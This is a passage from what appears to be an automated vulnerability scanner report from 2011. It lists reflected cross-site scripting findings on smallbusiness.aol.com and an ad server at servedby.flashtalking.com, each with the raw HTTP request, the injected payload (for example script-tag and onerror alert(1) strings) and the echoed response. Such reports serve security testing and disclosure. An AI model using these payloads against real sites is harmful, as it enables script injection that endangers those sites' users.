GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=8b507"-alert(1)-"1359c52bda6&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:48:25 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=11327F503D579E";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:48:25 GMT
Cache-Control: no-cache, no-store
Content-Length: 758
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 mdw061001 (MII-APC/1.6)


var ftGUID_97126="11327F503D579E";
var ftConfID_97126="0";
var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn
...[SNIP]...
;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=8b507"-alert(1)-"1359c52bda6&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339";
var ftKeyword_97126="";
var ftSegment_97126="";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/97126/167568/js/j-97126-167568
...[SNIP]...

1.195. http://servedby.flashtalking.com/imp/3/14886 [fty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14886

Issue detail

The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b515f"-alert(1)-"d141519c932 was submitted in the fty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=b515f"-alert(1)-"d141519c932&ftadz=&ftscw=&cachebuster=710415.5826382339 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:48:38 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=11328D1137525B";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:48:38 GMT
Content-Length: 758
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 mdw061003 (MII-APC/1.6)


var ftGUID_97126="11328D1137525B";
var ftConfID_97126="0";
var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn
...[SNIP]...
g=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=b515f"-alert(1)-"d141519c932&ftadz=&ftscw=&cachebuster=710415.5826382339";
var ftKeyword_97126="";
var ftSegment_97126="";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/97126/167568/js/j-97126-167568.js"
...[SNIP]...

1.196. http://servedby.flashtalking.com/imp/3/14886 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14886

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9548d"-alert(1)-"1c425036cc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339&9548d"-alert(1)-"1c425036cc1=1 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:49:29 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1132056B5C07B9";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:49:29 GMT
Cache-Control: no-cache, no-store
Content-Length: 761
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 mdw061003 (MII-APC/1.6)


var ftGUID_97126="1132056B5C07B9";
var ftConfID_97126="0";
var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn
...[SNIP]...
3575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339&9548d"-alert(1)-"1c425036cc1=1";
var ftKeyword_97126="";
var ftSegment_97126="";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/97126/167568/js/j-97126-167568.js" id="ftscript_m97126" name="ftscript_m97126
...[SNIP]...

1.197. http://smallbusiness.aol.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 998a2"><script>alert(1)</script>9cd08062e59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?998a2"><script>alert(1)</script>9cd08062e59=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:00 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 63616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/?998a2"><script>alert(1)</script>9cd08062e59=1"/>
...[SNIP]...

1.198. http://smallbusiness.aol.com/2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7d53"><img%20src%3da%20onerror%3dalert(1)>d069487f7e was submitted in the REST URL parameter 3. This input was echoed as c7d53"><img src=a onerror=alert(1)>d069487f7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /2011/02/01c7d53"><img%20src%3da%20onerror%3dalert(1)>d069487f7e/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:13 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:11:12 GMT; path=/
Keep-Alive: timeout=5, max=999980
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<input type="hidden" name="referer" value="http://smallbusiness.aol.com:1080/2011/02/01c7d53"><img src=a onerror=alert(1)>d069487f7e/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/">
...[SNIP]...

1.199. http://smallbusiness.aol.com/2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53b6e"><script>alert(1)</script>a03fac11be7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/?53b6e"><script>alert(1)</script>a03fac11be7=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:05 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:11:04 GMT; path=/
Keep-Alive: timeout=5, max=999981
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/?53b6e"><script>alert(1)</script>a03fac11be7=1"/>
...[SNIP]...

1.200. http://smallbusiness.aol.com/2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://smallbusiness.aol.com
Path:   /2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4f14"%20a%3db%202dd62ea6f1a was submitted in the REST URL parameter 3. This input was echoed as e4f14" a=b 2dd62ea6f1a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /2011/02/02e4f14"%20a%3db%202dd62ea6f1a/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:13 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:11:12 GMT; path=/
Keep-Alive: timeout=5, max=999972
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 82596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<input type="hidden" name="referer" value="http://smallbusiness.aol.com:1080/2011/02/02e4f14" a=b 2dd62ea6f1a/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/">
...[SNIP]...

1.201. http://smallbusiness.aol.com/2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c220"><script>alert(1)</script>01c18185ad3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/?9c220"><script>alert(1)</script>01c18185ad3=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:04 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:11:04 GMT; path=/
Keep-Alive: timeout=5, max=999991
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 82663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/?9c220"><script>alert(1)</script>01c18185ad3=1"/>
...[SNIP]...

1.202. http://smallbusiness.aol.com/2011/02/05/make-friends/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://smallbusiness.aol.com
Path:   /2011/02/05/make-friends/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8709"a%3d"b"648ab0da27 was submitted in the REST URL parameter 3. This input was echoed as c8709"a="b"648ab0da27 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /2011/02/05c8709"a%3d"b"648ab0da27/make-friends/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:12 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:11:11 GMT; path=/
Keep-Alive: timeout=5, max=999960
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 59105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<input type="hidden" name="referer" value="http://smallbusiness.aol.com:1080/2011/02/05c8709"a="b"648ab0da27/make-friends/">
...[SNIP]...

1.203. http://smallbusiness.aol.com/2011/02/05/make-friends/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /2011/02/05/make-friends/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97c25"><script>alert(1)</script>7fcfb2a62be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/05/make-friends/?97c25"><script>alert(1)</script>7fcfb2a62be=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:04 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:11:03 GMT; path=/
Keep-Alive: timeout=5, max=999991
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 59176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/2011/02/05/make-friends/?97c25"><script>alert(1)</script>7fcfb2a62be=1"/>
...[SNIP]...

1.204. http://smallbusiness.aol.com/2011/02/05/packers-vs-steelers-battle-of-the-bar-owners/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /2011/02/05/packers-vs-steelers-battle-of-the-bar-owners/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae3ca"><script>alert(1)</script>e8a6ea52003 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/05/packers-vs-steelers-battle-of-the-bar-owners/?ae3ca"><script>alert(1)</script>e8a6ea52003=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:03 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:11:02 GMT; path=/
Keep-Alive: timeout=5, max=999996
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 76147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/2011/02/05/packers-vs-steelers-battle-of-the-bar-owners/?ae3ca"><script>alert(1)</script>e8a6ea52003=1"/>
...[SNIP]...

1.205. http://smallbusiness.aol.com/2011/02/06/enjoy-the-ride/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://smallbusiness.aol.com
Path:   /2011/02/06/enjoy-the-ride/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa121"a%3d"b"4a36e3efe23 was submitted in the REST URL parameter 3. This input was echoed as fa121"a="b"4a36e3efe23 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /2011/02/06fa121"a%3d"b"4a36e3efe23/enjoy-the-ride/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:12 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:11:11 GMT; path=/
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 58597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<input type="hidden" name="referer" value="http://smallbusiness.aol.com:1080/2011/02/06fa121"a="b"4a36e3efe23/enjoy-the-ride/">
...[SNIP]...

1.206. http://smallbusiness.aol.com/2011/02/06/enjoy-the-ride/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /2011/02/06/enjoy-the-ride/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3029a"><script>alert(1)</script>5a9c8cbf6a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/06/enjoy-the-ride/?3029a"><script>alert(1)</script>5a9c8cbf6a4=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:05 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:11:04 GMT; path=/
Keep-Alive: timeout=5, max=999986
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 58663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/2011/02/06/enjoy-the-ride/?3029a"><script>alert(1)</script>5a9c8cbf6a4=1"/>
...[SNIP]...

1.207. http://smallbusiness.aol.com/category/advertising-and-marketing/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://smallbusiness.aol.com
Path:   /category/advertising-and-marketing/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5c1c"><a>d5dbf42efbb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /category/advertising-and-marketinga5c1c"><a>d5dbf42efbb/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:12 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999969
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 44344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/category/advertising-and-marketinga5c1c"><a>d5dbf42efbb/"/>
...[SNIP]...

1.208. http://smallbusiness.aol.com/category/advertising-and-marketing/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smallbusiness.aol.com
Path:   /category/advertising-and-marketing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10cba"><script>alert(1)</script>fedb4407f14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/advertising-and-marketing/?10cba"><script>alert(1)</script>fedb4407f14=1 HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:04 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999995
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 79036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="canonical" href="http://smallbusiness.aol.com/category/advertising-and-marketing/?10cba"><script>alert(1)</script>fedb4407f14=1"/>
...[SNIP]...

1.209. http://smallbusiness.aol.com/category/money/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://smallbusiness.aol.com
Path:   /category/money/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 174a7"><a>518d741443b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /category/money174a7"><a>518d741443b/ HTTP/1.1
Host: smallbusiness.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:11:09 GMT
Server: Apache/2.2
